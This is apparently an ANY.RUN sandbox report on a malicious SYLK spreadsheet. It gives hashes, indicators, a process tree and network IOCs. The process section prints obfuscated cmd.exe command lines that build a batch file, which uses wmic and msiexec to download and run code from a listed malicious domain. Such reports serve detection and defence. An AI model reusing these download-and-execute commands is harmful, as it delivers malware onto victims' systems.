analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

William Buckner.slk

Full analysis: https://app.any.run/tasks/6f7a2771-2dda-467f-9664-272dc09e4f5c
Verdict: Malicious activity
Analysis date: March 31, 2020, 02:39:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators, with escape sequences
MD5:

8078FB812CB506CE08F371A936F666D4

SHA1:

0A962AD121E96C2BA4D51761E55CDBE9C4DC4082

SHA256:

5F43A9F10FE23D562397A812FDB6B4969F7158D2D45480B36224DC9821072A3D

SSDEEP:

48:Us0ZUdZhdqBbJkrKlL4mDAezvIondzHjiPAdHi8AdHW82d0HXWINmqNRCcCp3u0s:yOdPdqBbJNn1zOACgT3qL2i

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3376)

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3376)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • Cmd.exe (PID: 2420)
      • Cmd.exe (PID: 1248)
      • cmd.exe (PID: 660)
      • cmd.exe (PID: 3300)

    • Uses WMIC.EXE to create a new process

      • cmd.exe (PID: 3300)

    • Application launched itself

      • cmd.exe (PID: 660)
      • cmd.exe (PID: 3300)

    • Executed via WMI

      • Msiexec.exe (PID: 2640)

  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3376)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.slk | SYLK - SYmbolic LinK data (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
58
Monitored processes
19
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wmic.exe no specs msiexec.exe no specs msiexec.exe

Process information

PID
CMD
Path
Indicators
Parent process
3376"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2420Cmd.exe /c EChO|SEt /p="@echo off&wm^ic pro^ces^s c^all cr^eat^e 'Ms">%temp%\wvFXE.b^a^tC:\Windows\system32\Cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1248Cmd.exe /c @echo off&pi^ng 43 -n 1&echo|set /p="iexec /ihttp^:^/^/^dersh">>%temp%\wvFXE.b^a^tC:\Windows\system32\Cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
660cmd.exe /c @echo off&pi^ng 43 -n 3&echo|set /p="ov.com/407.php ">>%temp%\wvFXE.b^a^tC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3300cmd.exe /c @echo off&pi^ng 43 -n 5&echo|set /p=" ^/q'">>%temp%\wvFXE.bat&%temp%\wvFXE.b^a^tC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2380ping 43 -n 1C:\Windows\system32\PING.EXECmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2824C:\Windows\system32\cmd.exe /S /D /c" EChO"C:\Windows\system32\cmd.exeCmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2816C:\Windows\system32\cmd.exe /S /D /c" SEt /p="@echo off&wm^ic pro^ces^s c^all cr^eat^e 'Ms" 1>C:\Users\admin\AppData\Local\Temp\wvFXE.bat"C:\Windows\system32\cmd.exeCmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2868ping 43 -n 3C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3144ping 43 -n 5C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
658
Read events
606
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
3376EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR6C5E.tmp.cvr
MD5:
SHA256:
620cmd.exeC:\Users\admin\AppData\Local\Temp\wvFXE.battext
MD5:C68751154B8DAB352576F3CB5896B7CA
SHA256:5E6904C3BC949B51B075A644063F4BB88AD4B0DB0EA38F48878AD307247F2A20
1832cmd.exeC:\Users\admin\AppData\Local\Temp\wvFXE.battext
MD5:0B41C16F13186E319A0DAF3F557479FB
SHA256:11BE562FDB8F0A5B7427DF52E83E3889D43AB2A4C1231599AEFA62E147D1BC16
2816cmd.exeC:\Users\admin\AppData\Local\Temp\wvFXE.battext
MD5:0B41C16F13186E319A0DAF3F557479FB
SHA256:11BE562FDB8F0A5B7427DF52E83E3889D43AB2A4C1231599AEFA62E147D1BC16
3176cmd.exeC:\Users\admin\AppData\Local\Temp\wvFXE.battext
MD5:D348279FDD84AD8CFEACE44F4DBBC193
SHA256:450A02C8FD5E2E89AAC22B2EEE386154EDDC2D6A71F0109030F99CA96632DD9E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2400
msiexec.exe
GET
198.54.117.218:80
http://www.dershov.com/407.php?from=@
US
malicious
2400
msiexec.exe
GET
302
192.64.119.126:80
http://dershov.com/407.php
US
html
60 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2400
msiexec.exe
192.64.119.126:80
dershov.com
Namecheap, Inc.
US
suspicious
2400
msiexec.exe
198.54.117.218:80
www.dershov.com
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
dershov.com
  • 192.64.119.126
malicious
www.dershov.com
  • 198.54.117.218
  • 198.54.117.217
  • 198.54.117.210
  • 198.54.117.216
  • 198.54.117.215
  • 198.54.117.211
  • 198.54.117.212
malicious

Threats

PID
Process
Class
Message
2400
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2400
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
William Buckner.slk